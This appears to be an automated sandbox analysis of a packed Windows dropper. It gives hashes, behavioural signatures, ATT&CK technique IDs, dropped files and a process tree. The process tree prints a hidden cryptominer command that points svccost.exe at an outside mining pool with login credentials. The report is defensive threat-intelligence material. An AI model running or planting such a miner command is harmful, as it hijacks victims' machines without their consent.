098c682024dbb4c2737c07f35d98dbeda7a7ef5edcf52d1777a37a2f1c1e0450

Analysis

max time kernel
283s
max time network
296s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
01-12-2022 13:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

098c682024dbb4c2737c07f35d98dbeda7a7ef5edcf52d1777a37a2f1c1e0450.exe
Size

327KB
MD5

a0ea780dfafd764bc6742aa3c230f16e
SHA1

24b4eca3a13490e5bdbef0f33dd89183427f3ca7
SHA256

098c682024dbb4c2737c07f35d98dbeda7a7ef5edcf52d1777a37a2f1c1e0450
SHA512

de3b6d406a55d4ef63edc06832fdc34d2e5b69269074d4cc5f5708fb056d690f689d74192fe9d6c4f311229c94f7988f1f42ef3134364647399004baf714e16c
SSDEEP

6144:Lu2urzh9xu/XkauJzxeUL1TjPcwNY27MxG1AVZJh0X/4To4NqB1cDNVqHw5smZ:Lutrzh9xOXkFxeUpTjjm27MgCVFGgTog

Score

8^/10

upx

Malware Config

Signatures

Executes dropped EXE 4 IoCs

pid	Process
880	Browser.exe
900	svccost.exe
5104	Browser.exe
2624	svccost.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0008000000022de9-133.dat	upx
behavioral2/files/0x0008000000022de9-134.dat	upx
behavioral2/memory/880-137-0x0000000000400000-0x0000000000416000-memory.dmp	upx
behavioral2/files/0x0008000000022de9-144.dat	upx
behavioral2/memory/5104-145-0x0000000000400000-0x0000000000416000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	098c682024dbb4c2737c07f35d98dbeda7a7ef5edcf52d1777a37a2f1c1e0450.exe

Loads dropped DLL 4 IoCs

pid	Process
900	svccost.exe
900	svccost.exe
2624	svccost.exe
2624	svccost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2468 wrote to memory of 880	2468	098c682024dbb4c2737c07f35d98dbeda7a7ef5edcf52d1777a37a2f1c1e0450.exe	80
PID 2468 wrote to memory of 880	2468	098c682024dbb4c2737c07f35d98dbeda7a7ef5edcf52d1777a37a2f1c1e0450.exe	80
PID 2468 wrote to memory of 880	2468	098c682024dbb4c2737c07f35d98dbeda7a7ef5edcf52d1777a37a2f1c1e0450.exe	80
PID 880 wrote to memory of 900	880	Browser.exe	81
PID 880 wrote to memory of 900	880	Browser.exe	81
PID 880 wrote to memory of 900	880	Browser.exe	81
PID 2468 wrote to memory of 5104	2468	098c682024dbb4c2737c07f35d98dbeda7a7ef5edcf52d1777a37a2f1c1e0450.exe	83
PID 2468 wrote to memory of 5104	2468	098c682024dbb4c2737c07f35d98dbeda7a7ef5edcf52d1777a37a2f1c1e0450.exe	83
PID 2468 wrote to memory of 5104	2468	098c682024dbb4c2737c07f35d98dbeda7a7ef5edcf52d1777a37a2f1c1e0450.exe	83
PID 5104 wrote to memory of 2212	5104	Browser.exe	86
PID 5104 wrote to memory of 2212	5104	Browser.exe	86
PID 5104 wrote to memory of 2212	5104	Browser.exe	86
PID 2212 wrote to memory of 2624	2212	cmd.exe	90
PID 2212 wrote to memory of 2624	2212	cmd.exe	90
PID 2212 wrote to memory of 2624	2212	cmd.exe	90

C:\Users\Admin\AppData\Local\Temp\098c682024dbb4c2737c07f35d98dbeda7a7ef5edcf52d1777a37a2f1c1e0450.exe
"C:\Users\Admin\AppData\Local\Temp\098c682024dbb4c2737c07f35d98dbeda7a7ef5edcf52d1777a37a2f1c1e0450.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2468
- C:\Users\Admin\AppData\Local\Temp\MrDD21.tmp\Browser.exe
  "C:\Users\Admin\AppData\Local\Temp\MrDD21.tmp\Browser.exe" /NOCONSOLE svccost.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:880
- - C:\Users\Admin\AppData\Local\Temp\MrDD21.tmp\svccost.exe
    svccost.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:900
- C:\Users\Admin\AppData\Local\Temp\MrDD21.tmp\Browser.exe
  "C:\Users\Admin\AppData\Local\Temp\MrDD21.tmp\Browser.exe" /NOCONSOLE AnotherPerson.bat
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c AnotherPerson.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2212
  - - C:\Users\Admin\AppData\Local\Temp\MrDD21.tmp\svccost.exe
      svccost.exe --algo=sha256d --url=http://paljacinke.aquarium-stakany.org:8332/ --user=d38a39ys_l3kpy --pass=fuckyousniff --
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2624

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MrDD21.tmp\AnotherPerson.bat

Filesize
122B

MD5
de6f0fcd4edf6d058a16a0eb05059d73

SHA1
df5ff15b89ecfdacd81387eb8e3cb3da429f0496

SHA256
3dab99a075493d43ad275a9cee730097b8ee8be28c821353e9f0cbf09611a1b8

SHA512
fde4eb039d6a96d2586fc48f7bc82e2bc3bede9dfde3ac050533bed794165f8e249db43b912c7157ca1a21f706973d04e5d204728fc92233efd477d2e724dc54

Download Submit
C:\Users\Admin\AppData\Local\Temp\MrDD21.tmp\Browser.exe

Filesize
36KB

MD5
26b429976e5fdf52e5755a5515364037

SHA1
0621a11789b078aa33bb245eadf197e0994b7fb5

SHA256
14b6653b161d1a1090e757684f6e3e8f9ffaebb90d226d863871822a19ee65db

SHA512
b3c6cdc5a0a65fb398c7449599cf10ecd8e9c8827156c05ad629f4f5ea24574747b18474c549dc84c34a6ec3b9ab098f8da7e10ddde46b1ba1a5044ad6984547

Download Submit
C:\Users\Admin\AppData\Local\Temp\MrDD21.tmp\Browser.exe

Filesize
36KB

MD5
26b429976e5fdf52e5755a5515364037

SHA1
0621a11789b078aa33bb245eadf197e0994b7fb5

SHA256
14b6653b161d1a1090e757684f6e3e8f9ffaebb90d226d863871822a19ee65db

SHA512
b3c6cdc5a0a65fb398c7449599cf10ecd8e9c8827156c05ad629f4f5ea24574747b18474c549dc84c34a6ec3b9ab098f8da7e10ddde46b1ba1a5044ad6984547

Download Submit
C:\Users\Admin\AppData\Local\Temp\MrDD21.tmp\Browser.exe

Filesize
36KB

MD5
26b429976e5fdf52e5755a5515364037

SHA1
0621a11789b078aa33bb245eadf197e0994b7fb5

SHA256
14b6653b161d1a1090e757684f6e3e8f9ffaebb90d226d863871822a19ee65db

SHA512
b3c6cdc5a0a65fb398c7449599cf10ecd8e9c8827156c05ad629f4f5ea24574747b18474c549dc84c34a6ec3b9ab098f8da7e10ddde46b1ba1a5044ad6984547

Download Submit
C:\Users\Admin\AppData\Local\Temp\MrDD21.tmp\libcurl-4.dll

Filesize
295KB

MD5
6aa2534bce88c87f81344c37c857f863

SHA1
5f3b3b559e1e2ae1a3947537e30c266134017f98

SHA256
4c1a15de636720aece3b967ce599468eae8a67a2d3cb9e00aa308f2b9f10e74a

SHA512
a7950f05cbe3a3163d1f383395e2c41c42321042df29b141c1243c31e47118362e0aea8a81ccc0f56ae14a0914f246e10ced9be193ca9f65bc90d12f9b86c33a

Download Submit
C:\Users\Admin\AppData\Local\Temp\MrDD21.tmp\libcurl-4.dll

Filesize
295KB

MD5
6aa2534bce88c87f81344c37c857f863

SHA1
5f3b3b559e1e2ae1a3947537e30c266134017f98

SHA256
4c1a15de636720aece3b967ce599468eae8a67a2d3cb9e00aa308f2b9f10e74a

SHA512
a7950f05cbe3a3163d1f383395e2c41c42321042df29b141c1243c31e47118362e0aea8a81ccc0f56ae14a0914f246e10ced9be193ca9f65bc90d12f9b86c33a

Download Submit
C:\Users\Admin\AppData\Local\Temp\MrDD21.tmp\libcurl-4.dll

Filesize
295KB

MD5
6aa2534bce88c87f81344c37c857f863

SHA1
5f3b3b559e1e2ae1a3947537e30c266134017f98

SHA256
4c1a15de636720aece3b967ce599468eae8a67a2d3cb9e00aa308f2b9f10e74a

SHA512
a7950f05cbe3a3163d1f383395e2c41c42321042df29b141c1243c31e47118362e0aea8a81ccc0f56ae14a0914f246e10ced9be193ca9f65bc90d12f9b86c33a

Download Submit
C:\Users\Admin\AppData\Local\Temp\MrDD21.tmp\pthreadGC2.dll

Filesize
70KB

MD5
492153d3b3f0fb99abd48752c8d2e796

SHA1
dae87bee3d82a812cf321d933945647c4a63d854

SHA256
3866bdf85958e47ab3110884035a74469fabe2495cf3cc64194d390211e312f5

SHA512
3e4ee410bef252ae25a9c1065af196a41979c612478a5897c009ca25d23e9d45b091ca7787f43946aceed537a97299e97519c8bba3e79ab84205eb196c46d515

Download Submit
C:\Users\Admin\AppData\Local\Temp\MrDD21.tmp\pthreadGC2.dll

Filesize
70KB

MD5
492153d3b3f0fb99abd48752c8d2e796

SHA1
dae87bee3d82a812cf321d933945647c4a63d854

SHA256
3866bdf85958e47ab3110884035a74469fabe2495cf3cc64194d390211e312f5

SHA512
3e4ee410bef252ae25a9c1065af196a41979c612478a5897c009ca25d23e9d45b091ca7787f43946aceed537a97299e97519c8bba3e79ab84205eb196c46d515

Download Submit
C:\Users\Admin\AppData\Local\Temp\MrDD21.tmp\pthreadGC2.dll

Filesize
70KB

MD5
492153d3b3f0fb99abd48752c8d2e796

SHA1
dae87bee3d82a812cf321d933945647c4a63d854

SHA256
3866bdf85958e47ab3110884035a74469fabe2495cf3cc64194d390211e312f5

SHA512
3e4ee410bef252ae25a9c1065af196a41979c612478a5897c009ca25d23e9d45b091ca7787f43946aceed537a97299e97519c8bba3e79ab84205eb196c46d515

Download Submit
C:\Users\Admin\AppData\Local\Temp\MrDD21.tmp\svccost.exe

Filesize
170KB

MD5
e02477250ec492c18a2073305b557fd3

SHA1
2e306243feefa9d04c87ca6cbfb9e5e9647defbc

SHA256
8670d1587ed339719b495dca78e54e812efb6ce8bf263cdac3f3096f21a6f70e

SHA512
c5a1f5dd77fd6ff1dda6f1d34a6a8ee7b8ae72384b1784b4062e95922610db8ab327d4c639ba4d41d99cfdfd96a28e31edc3f43577c8ee43e7515217c04cba46

Download Submit
C:\Users\Admin\AppData\Local\Temp\MrDD21.tmp\svccost.exe

Filesize
170KB

MD5
e02477250ec492c18a2073305b557fd3

SHA1
2e306243feefa9d04c87ca6cbfb9e5e9647defbc

SHA256
8670d1587ed339719b495dca78e54e812efb6ce8bf263cdac3f3096f21a6f70e

SHA512
c5a1f5dd77fd6ff1dda6f1d34a6a8ee7b8ae72384b1784b4062e95922610db8ab327d4c639ba4d41d99cfdfd96a28e31edc3f43577c8ee43e7515217c04cba46

Download Submit
C:\Users\Admin\AppData\Local\Temp\MrDD21.tmp\svccost.exe

Filesize
170KB

MD5
e02477250ec492c18a2073305b557fd3

SHA1
2e306243feefa9d04c87ca6cbfb9e5e9647defbc

SHA256
8670d1587ed339719b495dca78e54e812efb6ce8bf263cdac3f3096f21a6f70e

SHA512
c5a1f5dd77fd6ff1dda6f1d34a6a8ee7b8ae72384b1784b4062e95922610db8ab327d4c639ba4d41d99cfdfd96a28e31edc3f43577c8ee43e7515217c04cba46

Download Submit
memory/880-137-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/5104-145-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download